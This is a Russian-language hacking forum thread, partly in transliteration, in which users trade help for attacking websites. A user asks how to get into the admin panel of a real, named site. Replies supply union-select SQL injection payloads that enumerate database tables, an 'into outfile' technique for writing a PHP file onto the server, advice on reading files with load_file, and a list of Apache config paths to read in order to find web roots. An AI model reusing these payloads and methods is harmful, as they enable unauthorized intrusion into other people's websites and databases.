Ваши вопросы по уязвимостям.

vot posmotrite http://www.vashstile.ru/admin zdes kak to .htacces..

esli napisu login i parol pravilno moqu zayti v admin panel??

 

Не?

 

DeluxeS

ну скажем так штатный экстрасенс работает сейчас в разделе инклюдов... можно линк в студию?

и зачем тебе использовать здесь concat?
union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3C42523 E,table_name),11+from+information_schema.tables+li mit+1,1

или же делaй запрос без concat-a ... или же попробуй так
union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,table_name,table_schema),11+from+information_schema.tables+li mit+1,1

 

a moy vopros??

 

LokbatanLi http://translit.ru/

 

ne nado pomoymu..

vot est takoy sayt http://www.vashstile.ru/admin
v admin panle est .htacces a kak zayti v panel esli login i parol pravilno napisu moqu zayti panel??

 

LokbatanLi во первых я ни фига не понял твой вопрос, во вторых писать надо не транслитом а кирилицой, в третьих если есть пароль и логин то пробуй зайти милок , кто тебе мешает? там вообщето бейсик авторизация... и в четвертых...ты уже затрахал мой мозг (думаю не только мой)

 

i ya toje pravilno napisu login i pass nu ne moqu zayti..takoy error Authorization Required//

 

Может авторизация возможна только с определённого ip

 

Есть там вывод...

Можно и через ошибку...

 

Имеется следующая инъекция в UPDATE-запросе:

Code:

update session set value='last_url|s:5:"/[COLOR=Green][SQL-inj][/COLOR]";', update_date=now() where session_name='3nr3r857efj64a1kcbk7vpepn0'

Что полезного можно сделать в данном случае и как?

 

a kto mojet raskazat ob file_priv out_into_file magic_quote est dlya etix satey..zaranie spasibo//

 

Тебе еще не надоело?! юзай поиск по форуму! всё описанно до мельчайших подробностей!

 

ne nasel dayte link toqda pojalusta//

 

Народ видел кто небудь переборщик путей через load_file ?(через скулю)
дефолтные не подходят

 

здесь читать нужно.

file_priv бывает Y и N
Y - есть права у юзера бд на чтение/запись
N - нету прав на чтение/запись

гыгы, мб into outfile ?
Используеться для загрузки файла на сервер через базу данных
Синтаксис:
[select_options] select_list [INTO_OUTFILE file_name export_option

По простонародному:
union select 1,2,3...[n] into outfile 'full_patch/file.php'/*

В двух словах не раскажешь, читай мануал по пхп

Путей к чему?

 

я так понял с твоего запроса,sql injection в параметре ГЕТ session?
если "да",то что мешает ее раскручивать?

Code:

param=-false'+order+by+[...]/*

 

Ins3t
полный путь до сайта, от корня,абсолютный вроде.

 

Ins3t spasibo po4ti ponel//

 

Если на серваке линух, то поищи httpd.conf, там будет прописан полный путь.

Code:

FreeBSD 
apache 1.3 
/usr/local/etc/apache/httpd.conf 

apache 2.2 
/usr/local/etc/apache22/httpd.conf 

Linux 
CentOS, Fedora (Redhat-системы) 
/etc/httpd/conf/httpd.conf 

Debian, Ubuntu 
apache 1.3 
/etc/apache/httpd.conf 

apache 2.2 
/etc/apache2/apache2.conf 

Gentoo 
apache 2.0 
/etc/apache2/httpd.conf